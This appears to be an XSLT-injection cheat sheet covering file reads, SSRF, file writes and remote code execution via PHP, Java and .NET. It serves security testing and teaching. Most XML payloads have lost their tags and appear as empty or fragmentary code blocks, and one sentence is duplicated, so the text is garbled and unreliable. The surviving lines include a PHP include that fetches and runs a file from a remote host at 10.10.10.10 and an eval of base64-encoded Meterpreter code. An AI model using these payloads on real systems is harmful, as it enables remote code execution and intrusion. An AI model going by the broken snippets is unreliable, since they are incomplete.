# XSLT Injection > Processing an un-validated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code ## Summary - [Tools](#tools) - [Methodology](#methodology) - [Determine the Vendor And Version](#determine-the-vendor-and-version) - [External Entity](#external-entity) - [Read Files and SSRF Using Document](#read-files-and-ssrf-using-document) - [Write Files with EXSLT Extension](#write-files-with-exslt-extension) - [Remote Code Execution with PHP Wrapper](#remote-code-execution-with-php-wrapper) - [Remote Code Execution with Java](#remote-code-execution-with-java) - [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net) - [Labs](#labs) - [References](#references) ## Tools No known tools currently exist to assist with XSLT exploitation. ## Methodology ### Determine the Vendor and Version ```xml ``` ```xml
Version:
Vendor:
Vendor URL: ``` ### External Entity Don't forget to test for XXE when you encounter XSLT files. ```xml ]> Fruits &ext_file;: - : ``` ### Read Files and SSRF Using Document ```xml Fruits: - : ``` ### Write Files with EXSLT Extension EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. ```xml Hello World! ``` ### Remote Code Execution with PHP Wrapper Execute the function `readfile`. ```xml ``` Execute the function `scandir`. ```xml ``` Execute a remote php file using `assert` ```xml include("http://10.10.10.10/test.php") ``` Execute a PHP meterpreter using PHP wrapper. ```xml eval(base64_decode('Base64-encoded Meterpreter code')) ``` Execute a remote php file using `file_put_contents` ```xml ``` ### Remote Code Execution with Java ```xml ``` ```xml . ``` ### Remote Code Execution with Native .NET ```xml
``` ```xml --- BEGIN COMMAND OUTPUT --- --- END COMMAND OUTPUT --- ``` ## Labs - [Root Me - XSLT - Code execution](https://www.root-me.org/en/Challenges/Web-Server/XSLT-Code-execution) ## References - [From XSLT code execution to Meterpreter shells - Nicolas Grégoire (@agarri) - July 2, 2012](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html) - [XSLT Injection - Fortify - January 16, 2021](http://web.archive.org/web/20210116001237/https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection) - [XSLT Injection Basics - Saxon - Hunnic Cyber Team - August 21, 2019](http://web.archive.org/web/20190821174700/https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/) - [Getting XXE in Web Browsers using ChatGPT - Igor Sak-Sakovskiy - May 22, 2024](https://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/) - [XSLT injection lead to file creation - PT SWARM (@ptswarm) - May 30, 2024](https://twitter.com/ptswarm/status/1796162911108255974/photo/1)